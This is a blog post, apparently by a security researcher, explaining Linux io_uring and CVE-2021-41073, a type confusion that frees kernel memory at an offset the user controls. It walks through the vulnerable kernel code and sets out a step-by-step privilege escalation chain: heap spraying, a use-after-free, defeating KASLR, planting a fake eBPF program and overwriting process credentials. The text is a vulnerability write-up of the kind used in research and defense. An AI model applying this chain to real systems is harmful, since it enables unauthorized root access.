<p style="text-align: center;"><sub><i>Original Date Published: March 8, 2022</i></sub></p>
![[62270d310fc0e771bbf3ea30_main_iou_imagemain_iouring.png]]
This blog post covers `io_uring`, a new Linux kernel system call interface, and how I exploited it for local privilege escalation (LPE).
A breakdown of the topics and questions discussed:
* What is `io_uring`? Why is it used?
* What is it used for?
* How does it work?
* How do I use it?
* Discovering a 0-day to exploit, [CVE-2021-41073 [13]](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-41073).
* Turning a type confusion vulnerability into memory corruption.
* Linux kernel memory fundamentals and tracking.
* Exploring the `io_uring` codebase for tools to construct exploit primitives.
* Creating new Linux kernel exploitation techniques and modifying existing ones.
* Finding target objects in the Linux kernel for exploit primitives.
* Mitigations and considerations to make exploitation harder in the future.
Like my [last post](https://chompie.rip/Blog+Posts/Kernel+Pwning+with+eBPF+-+a+Love+Story), I had no knowledge of `io_uring` when starting this project. This blog post will document the journey of tackling an unfamiliar part of the Linux kernel and ending up with a working exploit. My hope is that it will be useful to those interested in binary exploitation or kernel hacking and demystify the process. I also break down the different challenges I faced as an exploit developer and evaluate the practical effect of current exploit mitigations.
## io_uring: What is it?
Put simply, `io_uring` is a system call interface for Linux. It was first introduced in upstream Linux Kernel version 5.1 in 2019 [ [1]](https://blogs.oracle.com/linux/post/an-introduction-to-the-io-uring-asynchronous-io-framework). It enables an application to initiate system calls that can be performed asynchronously. Initially, `io_uring` just supported simple I/O system calls like `read()` and `write()`, but support for more is continually growing, and rapidly. It may eventually have support for most system calls [ [5]](https://lwn.net/Articles/810414/).
### Why is it Used?
The motivation behind `io_uring` is performance. Although it is still relatively new, its performance has improved quickly over time. Just last month, the creator and lead developer [Jens Axboe](https://twitter.com/axboe) boasted 13M per-core peak IOPS [ [2]](https://web.archive.org/web/20221130215710/https://twitter.com/axboe/status/1483790445532512260). There are a few key design elements of `io_uring` that reduce overhead and boost performance.
With `io_uring`, system calls can be completed asynchronously. This means an application thread does not have to block while waiting for the kernel to complete the system call. It can simply submit a request for a system call and retrieve the results later; no time is wasted by blocking.
Additionally, batches of system call requests can be submitted all at once. A task that would normally require multiple system calls can be reduced to just one. There is even a new feature that can reduce the number of system calls down to zero [ [7]](https://unixism.net/loti/tutorial/sq_poll.html). This vastly reduces the number of [context switches](https://en.wikipedia.org/wiki/Context_switch) from user space to kernel and back. Each context switch adds overhead, so reducing them has performance gains.
In `io_uring`, the bulk of the communication between the user space application and the kernel is done via shared buffers. This removes a large amount of overhead when performing system calls that transfer data between kernel and user space. For this reason, `io_uring` can be a zero-copy system [ [4]](https://unixism.net/loti/what_is_io_uring.html).
There is also a feature for “fixed” files that can improve performance. Before a read or write operation can occur with a file descriptor, the kernel must take a reference to the file. Because the file reference occurs [atomically](https://stackoverflow.com/questions/15054086/what-does-atomic-mean-in-programming/15054186), this causes overhead [ [6]](https://kernel.dk/io_uring.pdf). With a fixed file, this reference is held open, eliminating the need to take the reference for every operation.
The overhead of blocking, context switches, or copying bytes may not be noticeable for most cases, but in high performance applications it can start to matter [ [8]](https://unixism.net/loti/async_intro.html). It is also worth noting that system call performance has regressed after workaround patches for [Spectre and Meltdown](https://meltdownattack.com/), so reducing system calls can be an important optimization [ [9]](https://www.theregister.com/2021/06/22/spectre_linux_performance_test_analysis/).
### What is it Used for?
As noted above, high performance applications can benefit from using `io_uring`. It can be particularly useful for applications that are server/backend related, where a significant proportion of the application time is spent waiting on I/O.
### How Do I Use it?
Initially, I intended to use `io_uring` by making `io_uring` system calls directly (similar to what I did for [eBPF](https://chompie.rip/Blog+Posts/Kernel+Pwning+with+eBPF+-+a+Love+Story)). This is a pretty arduous endeavor, as `io_uring` is complex and the user space application is responsible for a lot of the work to get it to function properly. Instead, I did what a real developer would do if they wanted their application to make use of `io_uring` - use [`liburing`](https://github.com/axboe/liburing).
`liburing` is the user space library that provides a simplified API to interface with the `io_uring` kernel component [ [10]](https://github.com/axboe/liburing). It is developed and maintained by the lead developer of `io_uring`, so it is updated as things change on the kernel side.
One thing to note: `io_uring` does not implement versioning for its structures [ [11]](https://windows-internals.com/ioring-vs-io_uring-a-comparison-of-windows-and-linux-implementations/). So if an application uses a new feature, it first needs to check whether the kernel of the system it is running on supports it. Luckily, the [io_uring_setup](https://web.archive.org/web/20221130215710/https://manpages.debian.org/unstable/liburing-dev/io_uring_setup.2.en.html) system call returns this information.
Because of the fast rate of development of both `io_uring` and `liburing`, the available [documentation](https://unixism.net/loti/ref-liburing/) is out of date and incomplete. Code snippets and examples found online are inconsistent because new functions render the old ones obsolete (unless you already know `io_uring` very well, and want to have more low level control). This is a typical problem for [OSS](https://en.wikipedia.org/wiki/Open-source_software), and is not an indicator of the quality of the library, which is very good. I’m noting it here as a warning, because I found the initial process of using it somewhat confusing. Often times I saw fundamental behavior changes across kernel versions that were not documented.
_For a fun example, check out this_ [_blog post_](https://web.archive.org/web/20221130215710/https://wjwh.eu/posts/2021-10-01-no-syscall-server-iouring.html) _where the author created a server that performs zero syscalls per request_ [_[3]](https://wjwh.eu/posts/2021-10-01-no-syscall-server-iouring.html).
### How Does it Work?
As its name suggests, the central part of the `io_uring` model is a pair of [ring buffers](https://en.wikipedia.org/wiki/Circular_buffer) that live in memory shared by user space and the kernel. An `io_uring` instance is initialized by calling the [`io_uring_setup`](https://manpages.debian.org/unstable/liburing-dev/io_uring_setup.2.en.html) syscall. The kernel will return a file descriptor, which the user space application will use to create the shared memory mappings.
The mappings that are created:
- The **submission queue (SQ),** a ring buffer, where the system call requests are placed.
- The **completion queue (CQ),** a ring buffer, where completed system call requests are placed.
- The **submission queue entries (SQE)** array, of which the size is chosen during setup.
![[6225483516a3443aaa5d928d_Frame 11.png]]
<p style="text-align: center;"><sub><i>Mappings are created to share memory between user space and kernel</i></sub></p>
A SQE is filled out and placed in the submission queue ring for every request. A single SQE describes the system call operation that should be performed. The kernel is notified there is work in the SQ when the application makes an [io_uring_enter](https://manpages.debian.org/unstable/liburing-dev/io_uring_enter.2.en.html) system call. Alternatively, if the [IORING_SETUP_SQPOLL](https://unixism.net/loti/tutorial/sq_poll.html) feature is used, a kernel thread is created to poll the SQ for new entries, eliminating the need for the `io_uring_enter` system call.
![[62254a2816a3441cd95dfbf7_IOURING_2iouring2.png]]
<p style="text-align: center;"><sub><i>An application submitting a request for a read operation to io_uring</i></sub></p>
When completing each SQE, the kernel will first determine whether it will execute the operation asynchronously. If the operation can be done without blocking, it will be completed synchronously in the context of the calling thread. Otherwise, it is placed in the kernel async work queue and is completed by an `io_wrk` worker thread asynchronously. In both cases the calling thread won’t block, the difference is whether the operation will be completed immediately by the calling thread or an `io_wrk` thread later.
![[62254e7e026fe04d274416c8_IOURING_3 (2).png]]
<p style="text-align: center;"><sub><i>io_uring Handling a SQE</i></sub></p>
When the operation is complete, a completion queue entry (CQE) is placed in the CQ for every SQE. The application can poll the CQ for new CQEs. At that point the application will know that the corresponding operation has been completed. SQEs can be completed in any order, but can be linked to each other if a certain completion order is needed.
![[62254e9e080c4815ad3693b7_IOURING_4 (1).png]]<p style="text-align: center;"><sub><i>io_uring completing a request</i></sub></p>
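To make the submit/complete cycle concrete, here is a minimal user space sketch of the two rings. It is a toy model, not the kernel's layout: the `toy_*` names are hypothetical, the real SQ ring holds indices into the SQE array rather than the entries themselves, and the real implementation needs memory barriers because the two sides run concurrently.

```c
#include <assert.h>
#include <stdbool.h>
#include <stdint.h>

#define RING_ENTRIES 8u                 /* must be a power of two */
#define RING_MASK    (RING_ENTRIES - 1u)

/* Hypothetical stand-ins for an SQE and a CQE; the real structs carry far more. */
struct toy_sqe { uint8_t opcode; uint64_t user_data; };
struct toy_cqe { uint64_t user_data; int32_t res; };

struct toy_ring {
    uint32_t sq_head, sq_tail;          /* kernel consumes at head, app produces at tail */
    uint32_t cq_head, cq_tail;          /* app consumes at head, kernel produces at tail */
    struct toy_sqe sqes[RING_ENTRIES];
    struct toy_cqe cqes[RING_ENTRIES];
};

/* Application side: queue a request. Returns false if the SQ is full. */
static bool toy_submit(struct toy_ring *r, uint8_t opcode, uint64_t user_data)
{
    if (r->sq_tail - r->sq_head == RING_ENTRIES)
        return false;
    r->sqes[r->sq_tail & RING_MASK] = (struct toy_sqe){ opcode, user_data };
    r->sq_tail++;
    return true;
}

/* "Kernel" side: drain the SQ and post one CQE per SQE. Returns entries handled. */
static unsigned toy_kernel_process(struct toy_ring *r)
{
    unsigned done = 0;

    while (r->sq_head != r->sq_tail && r->cq_tail - r->cq_head < RING_ENTRIES) {
        struct toy_sqe *sqe = &r->sqes[r->sq_head & RING_MASK];

        /* Pretend every operation succeeds with result 0. */
        r->cqes[r->cq_tail & RING_MASK] = (struct toy_cqe){ sqe->user_data, 0 };
        r->sq_head++;
        r->cq_tail++;
        done++;
    }
    return done;
}

/* Application side: reap one completion. Returns false if the CQ is empty. */
static bool toy_reap(struct toy_ring *r, struct toy_cqe *out)
{
    if (r->cq_head == r->cq_tail)
        return false;
    *out = r->cqes[r->cq_head & RING_MASK];
    r->cq_head++;
    return true;
}
```

The `user_data` value is how the application matches a CQE back to the SQE that produced it, which matters because completions can arrive in any order.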
## Finding a Vulnerability
### Why io_uring?
Before diving into the vulnerability, I will give context on my motivations for looking at `io_uring` in the first place. A question I get asked often is, “_How do I pick where to reverse engineer/look for bugs/exploit, etc.?_” There is no one-size-fits-all answer to this question, but I can give insight on my reasoning in this particular case.
I became aware of `io_uring` while doing [research on eBPF](https://chompie.rip/Blog+Posts/Kernel+Pwning+with+eBPF+-+a+Love+Story). These two subsystems are often mentioned together because they both change how user space applications interact with the Linux kernel. I am keen on Linux kernel exploitation, so this was enough to pique my interest. Once I saw how quickly `io_uring` was growing, I knew it would be a good place to look. The old adage is true - new code means new bugs. When writing in an [unsafe programming language like C,](https://www.zdnet.com/article/which-are-the-most-insecure-programming-languages/) which is what the Linux kernel is written in, even the best and most experienced developers make mistakes [ [16]](https://www.zdnet.com/article/which-are-the-most-insecure-programming-languages/).
Additionally, new Android kernels now ship with `io_uring`. Because this feature is not inherently sandboxed by [SELinux](https://en.wikipedia.org/wiki/Security-Enhanced_Linux), it is a good source of bugs that could be used for privilege escalation on Android devices.
To summarize, I chose `io_uring` based on these factors:
- It is a new subsystem of the Linux kernel, which I have experience exploiting.
- It introduces a lot of new ways that an unprivileged user can interact with the kernel.
- New code is being introduced quickly.
- Exploitable bugs have already been found in it.
- Bugs in `io_uring` can be used to exploit Android devices (these are rare, Android is well sandboxed).
### The Vulnerability
As I mentioned previously, `io_uring` is growing quickly, with many new features being added.
One such feature is [IORING_OP_PROVIDE_BUFFERS](https://yhbt.net/lore/all/[email protected]/T/), which allows the application to register a pool of buffers the kernel can use for operations.
Because of the asynchronous nature of `io_uring`, selecting a buffer for an operation can get complicated. Because the operation won’t be completed for an indefinite amount of time, the application needs to keep track of what buffers are currently [in flight](https://stackoverflow.com/questions/48524418/what-does-in-flight-request-mean-for-a-web-browser) for a request. This feature saves the application the trouble of having to manage this, and treats buffer selection as automatic.
The buffers are identified by a group ID, `buf_group`, and a buffer ID, `bid`. When submitting a request, the application indicates that a provided buffer should be used by setting the `IOSQE_BUFFER_SELECT` flag and specifying the group ID. When the operation is complete, the `bid` of the buffer used is passed back via the CQE [ [14]](https://lwn.net/Articles/813311/).
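As a rough sketch of how the `bid` travels back in the CQE, the helpers below pack and unpack a buffer ID in a 32-bit flags word. The `toy_*` names are hypothetical, and the two constants are redefined locally with the values I understand `IORING_CQE_F_BUFFER` and `IORING_CQE_BUFFER_SHIFT` to have in the uapi header, so check your headers rather than trusting this copy.

```c
#include <assert.h>
#include <stdbool.h>
#include <stdint.h>

/* Assumed to mirror the io_uring uapi header; redefined so the sketch stands alone. */
#define TOY_CQE_F_BUFFER     (1u << 0)   /* IORING_CQE_F_BUFFER */
#define TOY_CQE_BUFFER_SHIFT 16          /* IORING_CQE_BUFFER_SHIFT */

/* Kernel side of the model: pack a buffer ID into the completion flags. */
static uint32_t toy_pack_cflags(uint16_t bid)
{
    return ((uint32_t)bid << TOY_CQE_BUFFER_SHIFT) | TOY_CQE_F_BUFFER;
}

/* Application side: recover the buffer ID, if the kernel selected a buffer. */
static bool toy_unpack_bid(uint32_t cflags, uint16_t *bid)
{
    if (!(cflags & TOY_CQE_F_BUFFER))
        return false;
    *bid = (uint16_t)(cflags >> TOY_CQE_BUFFER_SHIFT);
    return true;
}
```

An application would run the unpacking step on the `flags` field of each CQE it reaps, and then knows which of its registered buffers holds the data.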
I decided to play around with this feature after I saw the advisory for [CVE-2021-3491](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3491) - a bug in this same feature found by [Billy Jheng Bing-Jhong](https://twitter.com/st424204). My intention was to try to recreate a crash with this bug, but I was never able to get this feature to work quite right on the user space side. Fortunately, I decided to keep looking at the kernel code anyway, where I found another bug.
When registering a group of provided buffers, the `io_uring` kernel component allocates an [`io_buffer`](https://github.com/torvalds/linux/blob/6880fa6c56601bb8ed59df6c30fd390cc5f6dd8f/fs/io_uring.c#L258) structure for each buffer. These are stored in a linked list that contains all the `io_buffer` structures for a given `buf_group`.
```
struct io_buffer {
	struct list_head list;
	__u64 addr;
	__u32 len;
	__u16 bid;
};
```
Each request has an associated [`io_kiocb`](https://github.com/torvalds/linux/blob/6880fa6c56601bb8ed59df6c30fd390cc5f6dd8f/fs/io_uring.c#L827) structure, where information is stored to be used during completion. In particular, it contains a field named `rw`, which is a [`io_rw`](https://github.com/torvalds/linux/blob/6880fa6c56601bb8ed59df6c30fd390cc5f6dd8f/fs/io_uring.c#L558) structure. This stores information about r/w requests:
```
struct io_rw {
	struct kiocb kiocb;
	u64 addr;
	u64 len;
};
```
If a request is submitted with `IOSQE_BUFFER_SELECT` , the function [`io_rw_buffer_select`](https://github.com/torvalds/linux/blob/6880fa6c56601bb8ed59df6c30fd390cc5f6dd8f/fs/io_uring.c#L3089) is called before the read or write is performed. Here is where I noticed something strange.
```
static void __user *io_rw_buffer_select(struct io_kiocb *req, size_t *len, bool needs_lock)
{
	struct io_buffer *kbuf;
	u16 bgid;
	kbuf = (struct io_buffer *) (unsigned long) req->rw.addr;
	bgid = req->buf_index;
	kbuf = io_buffer_select(req, len, bgid, kbuf, needs_lock);
	if (IS_ERR(kbuf))
		return kbuf;
	req->rw.addr = (u64) (unsigned long) kbuf;
	req->flags |= REQ_F_BUFFER_SELECTED;
	return u64_to_user_ptr(kbuf->addr);
}
```
Here, the pointer for the request’s `io_kiocb` structure is called `req`. In the assignment `req->rw.addr = (u64) (unsigned long) kbuf;` above, the `io_buffer` pointer for the selected buffer is stored in `req->rw.addr`. This is strange, because this is where the (user space) target address for reading/writing is supposed to be stored! And here it is being filled with a kernel address…
It turns out that if a request is sent using the `IOSQE_BUFFER_SELECT` flag, the [`REQ_F_BUFFER_SELECT`](https://github.com/torvalds/linux/blob/6880fa6c56601bb8ed59df6c30fd390cc5f6dd8f/fs/io_uring.c#L763) flag is set in `req->flags` on the kernel side. Requests with this flag are handled slightly differently in certain spots in the code: instead of `req->rw.addr`, the `addr` field of the selected `io_buffer` (`kbuf->addr`) is used as the user space address.
Using the same field for user and kernel pointers seems dangerous - are there any spots where the `REQ_F_BUFFER_SELECT` case was forgotten and the two types of pointer were confused?
I looked in places where read/write operations were being done. My hope was to find a bug that gives a kernel write with user controllable data. I had no such luck - I didn’t see any places where the address stored in `req->rw.addr` would be used for a read/write if `REQ_F_BUFFER_SELECT` is set. However, I still managed to find a confusion of lesser severity in the function [`loop_rw_iter`](https://github.com/torvalds/linux/blob/6880fa6c56601bb8ed59df6c30fd390cc5f6dd8f/fs/io_uring.c#L3226):
```
/*
 * For files that don't have ->read_iter() and ->write_iter(), handle them
 * by looping over ->read() or ->write() manually.
 */
static ssize_t loop_rw_iter(int rw, struct io_kiocb *req, struct iov_iter *iter)
{
	struct kiocb *kiocb = &req->rw.kiocb;
	struct file *file = req->file;
	ssize_t ret = 0;
	/*
	 * Don't support polled IO through this interface, and we can't
	 * support non-blocking either. For the latter, this just causes
	 * the kiocb to be handled from an async context.
	 */
	if (kiocb->ki_flags & IOCB_HIPRI)
		return -EOPNOTSUPP;
	if (kiocb->ki_flags & IOCB_NOWAIT)
		return -EAGAIN;
	while (iov_iter_count(iter)) {
		struct iovec iovec;
		ssize_t nr;
		if (!iov_iter_is_bvec(iter)) {
			iovec = iov_iter_iovec(iter);
		} else {
			iovec.iov_base = u64_to_user_ptr(req->rw.addr);
			iovec.iov_len = req->rw.len;
		}
		if (rw == READ) {
			nr = file->f_op->read(file, iovec.iov_base,
					      iovec.iov_len, io_kiocb_ppos(kiocb));
		} else {
			nr = file->f_op->write(file, iovec.iov_base,
					       iovec.iov_len, io_kiocb_ppos(kiocb));
		}
		if (nr < 0) {
			if (!ret)
				ret = nr;
			break;
		}
		ret += nr;
		if (nr != iovec.iov_len)
			break;
		req->rw.len -= nr;
		req->rw.addr += nr;
		iov_iter_advance(iter, nr);
	}
	return ret;
}
```
For each open file descriptor, the kernel keeps an associated [`file`](https://github.com/torvalds/linux/blob/6880fa6c56601bb8ed59df6c30fd390cc5f6dd8f/include/linux/fs.h#L965) structure, which contains a [`file_operations`](https://github.com/torvalds/linux/blob/6880fa6c56601bb8ed59df6c30fd390cc5f6dd8f/include/linux/fs.h#L2071) structure, `f_op`. This structure holds pointers to functions that perform various operations on the file. As the description for `loop_rw_iter` states, if the type of file being operated on doesn’t implement the `read_iter` or `write_iter` operation, this function is called to do an iterative read/write manually. This is the case for `/proc` filesystem files (like `/proc/self/maps`, for example).
The first part of the offending function performs the proper checks. At the top of the loop, the `iov_iter_is_bvec(iter)` check examines the iter structure - if `REQ_F_BUFFER_SELECT` is set then `iter` is not a bvec, so the base address is taken from the iterator; when `iter` is a bvec, `req->rw.addr` is used as the base address for read/write.
The bug is in the last statements of the loop body, starting at `req->rw.len -= nr;`. As the function name suggests, the purpose is to perform an iterative read/write in a loop. At the end of the loop, the base address is advanced by the size in bytes of the read/write just performed. This is so the base address points to where the last r/w left off, in case another iteration of the loop is needed. For the case of `REQ_F_BUFFER_SELECT`, the base address is advanced by calling `iov_iter_advance`. No check is performed like in the beginning of the function - both addresses are advanced, including `req->rw.addr` via `req->rw.addr += nr;`. This is a type confusion - the code treats the address in `req->rw.addr` as if it were a user space pointer.
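The asymmetry is easier to see in a stripped-down user space model. The sketch below is not kernel code: the `toy_*` types and functions are hypothetical, and the "symmetric" variant is just one way the end of the loop could mirror the check at the top, shown for contrast.

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>

/* Toy request: `addr` is a user address for bvec iterators, but holds a
 * kernel io_buffer pointer when a provided buffer was selected. */
struct toy_req {
    uint64_t addr;
    uint64_t len;
};

/* Toy iterator: only tracks its kind and how many bytes remain. */
struct toy_iter {
    bool is_bvec;
    size_t remaining;
};

/* Mirrors the end of the vulnerable loop body: every cursor always advances. */
static void toy_advance_buggy(struct toy_req *req, struct toy_iter *it, size_t nr)
{
    req->len -= nr;
    req->addr += nr;          /* moves the io_buffer pointer in the non-bvec case */
    it->remaining -= nr;
}

/* Symmetric alternative: advance only the cursor that supplied the address. */
static void toy_advance_symmetric(struct toy_req *req, struct toy_iter *it, size_t nr)
{
    if (!it->is_bvec) {
        it->remaining -= nr;  /* the address came from the iterator */
    } else {
        req->len -= nr;       /* the address came from req->addr */
        req->addr += nr;
    }
}
```

With a non-bvec iterator and a 32 byte transfer, the buggy variant leaves `addr` 32 bytes past where it started, while the symmetric variant leaves it untouched.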
Remember, if `REQ_F_BUFFER_SELECT` is set, then `req->rw.addr` is a kernel address and points to the `io_buffer` used to represent the selected buffer. This doesn’t really affect anything during the operation itself, but after it is completed, the function [`io_put_rw_kbuf`](https://github.com/torvalds/linux/blob/6880fa6c56601bb8ed59df6c30fd390cc5f6dd8f/fs/io_uring.c#L2409) is called:
```
static inline unsigned int io_put_rw_kbuf(struct io_kiocb *req)
{
	struct io_buffer *kbuf;
	if (likely(!(req->flags & REQ_F_BUFFER_SELECTED)))
		return 0;
	kbuf = (struct io_buffer *) (unsigned long) req->rw.addr;
	return io_put_kbuf(req, kbuf);
}
```
First, the request’s flags are checked for `REQ_F_BUFFER_SELECTED`. If it is set, the function [`io_put_kbuf`](https://github.com/torvalds/linux/blob/6880fa6c56601bb8ed59df6c30fd390cc5f6dd8f/fs/io_uring.c#L2398) is called with `req->rw.addr` as the `kbuf` parameter. The code for this called function is below:
```
static unsigned int io_put_kbuf(struct io_kiocb *req, struct io_buffer *kbuf)
{
	unsigned int cflags;
	cflags = kbuf->bid << IORING_CQE_BUFFER_SHIFT;
	cflags |= IORING_CQE_F_BUFFER;
	req->flags &= ~REQ_F_BUFFER_SELECTED;
	kfree(kbuf);
	return cflags;
}
```
As seen above, `kfree` is called on `kbuf` (whose value is the address in `req->rw.addr`). Since this pointer was advanced by the size of the read/write performed, the originally allocated buffer isn’t the one being freed! Instead, what effectively happens is:
```
kfree(kbuf + user_controlled_value);
```
where `user_controlled_value` is the size of the completed read or write.
Since an `io_buffer` structure is 32 bytes, we effectively gain the ability to free buffers in the `kmalloc-32` cache at a controllable offset from our originally allocated buffer. I’ll talk a little bit more about Linux kernel memory internals in the next section, but the below diagram gives a visual of the bug:
![[62254ebdee34d32c897e53fe_IOURING_5.png]]
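The arithmetic behind the diagram can be checked with a small user space replica. This is a sketch under stated assumptions: the `toy_*` names are hypothetical, the struct only copies the field layout shown earlier, and the slot calculation assumes the neighboring objects are contiguous 32 byte allocations in the same slab page.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* User space replica of the kernel's struct io_buffer, for size math only. */
struct toy_list_head { struct toy_list_head *next, *prev; };
struct toy_io_buffer {
    struct toy_list_head list;
    uint64_t addr;
    uint32_t len;
    uint16_t bid;
};

#define TOY_OBJ_SIZE 32u   /* object size in the kmalloc-32 cache */

/* Address handed to kfree() after a transfer of `nr` bytes advanced the pointer. */
static uintptr_t toy_freed_address(uintptr_t kbuf, size_t nr)
{
    return kbuf + nr;
}

/* How many 32 byte objects past the original io_buffer the free lands on,
 * or -1 if the advanced pointer does not sit on an object boundary. */
static long toy_victim_slot(size_t nr)
{
    if (nr % TOY_OBJ_SIZE != 0)
        return -1;
    return (long)(nr / TOY_OBJ_SIZE);
}
```

On a 64-bit build the replica pads out to 32 bytes, which is why these objects live in `kmalloc-32`. A 32 byte read frees the object directly after the `io_buffer`, a 64 byte read frees the one after that, and so on.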
## Exploitation
The previous section covered the vulnerability; now it’s time to construct an exploit. For those who want to skip right to the exploit strategy, it is as follows:
- Set the [affinity](https://en.wikipedia.org/wiki/Processor_affinity) of the exploit application’s threads and `io_wrk` threads to the same CPU core, so they both use the same `kmalloc-32` cache slab.
- Spray the `kmalloc-32` cache with [`io_buffer`](https://github.com/torvalds/linux/blob/6880fa6c56601bb8ed59df6c30fd390cc5f6dd8f/fs/io_uring.c#L258) structures to drain all partially free slabs. Subsequent 32 byte allocations will be contiguous in a freshly allocated slab page. Now the vulnerability can be utilized as a use-after-free primitive.
- The use-after-free primitive can be used to construct universal object leaking and overwriting primitives.
- Use the object leaking primitive to leak the contents of an [`io_tctx_node`](https://github.com/torvalds/linux/blob/6880fa6c56601bb8ed59df6c30fd390cc5f6dd8f/fs/io_uring.c#L890) structure, which contains a pointer to a [`task_struct`](https://github.com/torvalds/linux/blob/6880fa6c56601bb8ed59df6c30fd390cc5f6dd8f/include/linux/sched.h#L723) of a thread belonging to our process.
- Use the object leaking primitive to leak the contents of a [`seq_operations`](https://github.com/torvalds/linux/blob/6880fa6c56601bb8ed59df6c30fd390cc5f6dd8f/include/linux/seq_file.h#L31) structure to break [KASLR](https://web.archive.org/web/20221130215710/https://dev.to/satorutakeuchi/a-brief-description-of-aslr-and-kaslr-2bbp).
- Use the object spray primitive to allocate a fake [`bpf_prog`](https://github.com/torvalds/linux/blob/6880fa6c56601bb8ed59df6c30fd390cc5f6dd8f/include/linux/filter.h#L563) structure.
- Use the object leaking primitive to leak the contents of an `io_buffer`, which contains a `list_head` [field](https://github.com/torvalds/linux/blob/6880fa6c56601bb8ed59df6c30fd390cc5f6dd8f/fs/io_uring.c#L259). This leaks the address of the controllable portion of the heap, which in turn gives the address of the fake `bpf_prog`.
- Use the object overwriting primitive to overwrite a [`sk_filter`](https://github.com/torvalds/linux/blob/6880fa6c56601bb8ed59df6c30fd390cc5f6dd8f/include/linux/filter.h#L593) structure. This object contains a pointer to the corresponding [eBPF](https://chompie.rip/Blog+Posts/Kernel+Pwning+with+eBPF+-+a+Love+Story) program attached to a socket. Replace the existing `bpf_prog` pointer with the fake one.
- Write to the attached socket to trigger the execution of the fake eBPF program, which is used to escalate privileges. The leaked `task_struct` is used to retrieve the pointer to the [`cred`](https://github.com/torvalds/linux/blob/6880fa6c56601bb8ed59df6c30fd390cc5f6dd8f/include/linux/cred.h#L110) structure of our process and overwrite [`uid`](https://github.com/torvalds/linux/blob/6880fa6c56601bb8ed59df6c30fd390cc5f6dd8f/include/linux/cred.h#L119) and [`euid`](https://github.com/torvalds/linux/blob/6880fa6c56601bb8ed59df6c30fd390cc5f6dd8f/include/linux/cred.h#L123).
### Building Primitives
The first step is to develop the exploit primitives. An **exploit primitive** is a generic building block for an exploit. An exploit will usually use multiple primitives together to achieve its goal (code execution, privilege escalation, etc). Some primitives are better than others - for example: arbitrary read and arbitrary write are very strong primitives. The ability to read and write at any address is usually enough to achieve whatever the exploit goal is.
In this case, the initial primitive we gain is pretty weak. We can free a kernel buffer at an offset we control. But we don’t actually know anything about where the buffer is or what is around it. It will take some creativity to turn it into something useful.
### From Type Confusion to Use-After-Free (UAF)
Because we control the freeing of a kernel buffer, it makes the most sense to turn this primitive into a stronger [use-after-free](https://cwe.mitre.org/data/definitions/416.html) primitive. If you aren’t familiar with what a use-after-free is, here’s the basic idea: A program uses some allocated memory, then somehow (either due to a bug or an exploit primitive) that memory is freed. After it is freed, the attacker triggers the reallocation of the same buffer and the original contents are overwritten. If the program that originally allocated the memory uses it after this occurs, it will be using the same memory, but its contents have been reallocated and used for something else! If we can control the new contents of the memory, we can influence how the program behaves. Essentially, it allows for overwriting an object in memory.
![[6225508cb789abaea03e3716_IOURING_7.png]]<p style="text-align: center;"><sub><i>Illustration of a use-after-free exploit</i></sub></p>
Now, the basic plan is simple: allocate an object, use the bug to free it, then reallocate the memory and overwrite with controllable data. At this point, I didn’t know what kind of object to target. First I had to try to overwrite _any_ object in the first place.
This turned out to be a good idea, because initially I was not able to reliably trigger the reallocation of the buffer freed by the bug. As shown below, the freed buffer has a different address than the reallocated buffer.
![[622790a8e7dec1015e688161_printk.png]]
<p style="text-align: center;"><sub><i>Debugging exploit in the kernel with printk()</i></sub></p>
My first inclination was that buffer size had something to do with it. 32 bytes is small, and there are a lot of kernel objects of the same size. Perhaps the race to allocate the freed buffer was lost every single time. I tested this by altering the definition of the `io_buffer` structure in the kernel. After some experimentation with different sizes, I confirmed that buffer size wasn’t the problem.
After learning a bit about Linux kernel memory internals and some debugging, I found the answer. You don’t need to deeply know Linux kernel memory internals to understand this exploit. However, knowing the general idea of how virtual memory is managed can be important for memory corruption vulnerabilities. I’ll give a very basic overview and point out the relevant parts in the next section.
### Linux Kernel Memory: SLOB on my SLAB
The Linux Kernel has several memory allocators in the code tree which include: **SLOB**, **SLAB**, and **SLUB**. They are mutually exclusive - you can only have one of them compiled into the kernel. These allocators represent the memory management layer that works on top of the system’s low level page allocator [ [20]](https://argp.github.io/2012/01/03/linux-kernel-heap-exploitation/).
![[6225548b9a63be14af86d4d8_IOURING_7 (2).png]]
The Linux kernel currently uses the **SLUB** allocator by default. For background, I will give a _very_ brief explanation on how this memory allocator works.
**SLUB** stores several memory caches that each hold the same type of object or generic objects of similar size.
Each one of these caches is represented by a kmem_cache structure, which holds a list of free objects and a list of slabs. Slabs (not to be confused with **SLAB** which is a different Linux kernel memory allocator) consist of one or more pages that are sliced into smaller blocks of memory for allocation. When the list of free objects is empty, a new slab page is allocated. In **SLUB,** each slab page is associated with a CPU. Each free object contains a metadata header that includes a pointer for the next free object in the cache.
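The freelist idea can be sketched in a few lines of user space C. This toy cache is a heavy simplification with hypothetical `toy_*` names: it models a single slab page and a single freelist, and leaves out per-CPU state, freelist pointer hardening, and everything else the real allocator does.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

#define TOY_OBJ_SIZE  32u
#define TOY_SLAB_OBJS 8u

/* One toy "slab page" carved into fixed-size objects. While an object is
 * free, its first bytes store the pointer to the next free object. */
struct toy_cache {
    void *page[TOY_OBJ_SIZE * TOY_SLAB_OBJS / sizeof(void *)];
    void *freelist;
};

/* Address of the i-th object in the page. */
static void *toy_obj_at(struct toy_cache *c, size_t i)
{
    return (unsigned char *)c->page + i * TOY_OBJ_SIZE;
}

static void toy_cache_init(struct toy_cache *c)
{
    c->freelist = NULL;
    /* Push objects in reverse so the first allocation returns object 0. */
    for (size_t i = TOY_SLAB_OBJS; i-- > 0; ) {
        void *obj = toy_obj_at(c, i);
        *(void **)obj = c->freelist;
        c->freelist = obj;
    }
}

/* Pop the head of the freelist; returns NULL when the page is exhausted. */
static void *toy_alloc(struct toy_cache *c)
{
    void *obj = c->freelist;
    if (obj)
        c->freelist = *(void **)obj;
    return obj;
}

/* Push the object back onto the head of the freelist (LIFO reuse). */
static void toy_free(struct toy_cache *c, void *obj)
{
    *(void **)obj = c->freelist;
    c->freelist = obj;
}
```

Two properties of this model matter for the rest of the post: allocations from a fresh page come out next to each other, and the most recently freed object is the first one handed out again.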
